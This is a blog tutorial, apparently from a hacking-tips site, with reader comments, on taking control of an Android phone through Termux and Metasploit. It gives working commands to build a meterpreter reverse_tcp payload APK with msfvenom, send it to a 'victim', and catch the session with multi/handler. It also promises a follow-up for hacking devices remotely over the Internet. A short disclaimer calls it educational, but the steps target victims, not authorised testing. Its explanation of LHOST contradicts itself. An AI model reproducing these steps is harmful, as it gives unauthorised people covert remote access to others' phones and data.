Let’s Hack Android Device by using Termux | Android Hacking |

Share via

Hello Everyone, Today we are going to learn about how to Hack an Android Device by Termux with the help of Metasploit Payload.

STEP 1: Install Metasploit in Termux

What is Metasploit ?

The Metasploit framework is a very effective tool that can be used by cybercriminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers. because it’s an open-source framework, it could be easily customized and used with most operating systems.

With Metasploit, the pen testing crew can use ready-made or custom code and introduce it right into a network to explore vulnerable spots. As with any other flavor of danger looking, once flaws are identified and documented, the data can be used to deal with systemic weaknesses and prioritize solutions.

What is Termux?

Termux is an Android, Linux emulator which provides CLI(Command-line interface). It is a Linux environment application that works directly with no rooting or setup required. A minimum base system is set up automatically, additional packages are available using the package manager.

Installing Metasploit by using the Commands Below:

pkg update && pkg upgrade -y
pkg install unstable-repo
pkg install metasploit
msfconsole

This installation will be going to take 140MB of disk space. Don’t minimize or close termux app while processing. The installation process will take up to 40minutes so be patient.

STEP 2: Create Metasploit Payload and Install into Victims Device.

What is a Payload?

A payload is a set of malicious codes that carry crucial information which can be used to hack any device. Payload is sent to the victim’s device just by an Apk. Create a Payload by using the Command below:

msfvenom -p android/meterpreter/reverse_tcp LHOST=x-x-x-x LPORT=8080 R>/sdcard/hack.apk
-p = Payload
 LHOST= Local host(IP address of Self)
 x-x-x-x= Victim's IP(Within your network)
 LPORT= Local port(Choose any valid port) 
/sdcard/name.apk= Give appropriate name to your Payload.

Now after some seconds, it will appear a little message that shows the payload’s size. After that check the file manager on the internal storage of your phone you’ll see a payload there, now you have to just send it to the victim Or install the Payload in the victim’s device.

Once you have sent this payload to your victim, Now its is time to get into the System

STEP 3: Setting up Metasploit Payload and Exploit it.

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set Lhost (Put-your-ip)
set Lport 8080
exploit

It’s all done now when the Victim clicks on the Payload or runs the Payload, you will notice that the meterpreter session is opened and Once the meterpreter session started successfully, just type help to see all the commands to Operate that device.

Don’t use this tool to Harm Anyone, We are not responsible for any illegal Activity done by you, All content Provided By this post is meant for Educational Purposes Only!!

Tell us in the comment section If you want It’s Second Part in which we can Send our to Payload anybody on the Internet and Hack any device Remotely.

Thanks! for Reading


Share via

This Post Has 15 Comments

  1. Masood

    You are amazing man !!!!

      1. Riyaz

        I want to learn more

  2. Khalid

    Bro i am really in love with you ….. You are such an amazing person ❣️

  3. Rajath

    Bro I want second part of this

  4. Naveet

    Termux is excellent for biginners but many package n tools not working wen we use for hacking

  5. Gad

    Second part please

  6. Sakib

    Please, send more like this

  7. Shashi

    Second part

  8. Kolli sumanth

    Bro you are great..
    I want second part bro..

    1. Geeksecurity

      Thanks dear, What you want in the next part please tell..

  9. Innunedo

    Your the best
    My hero
    So simple
    Unlike others
    This is actually my first time commenting on any blog
    I have never done this
    All you said worked as you said

    Thanks bro

Leave a Reply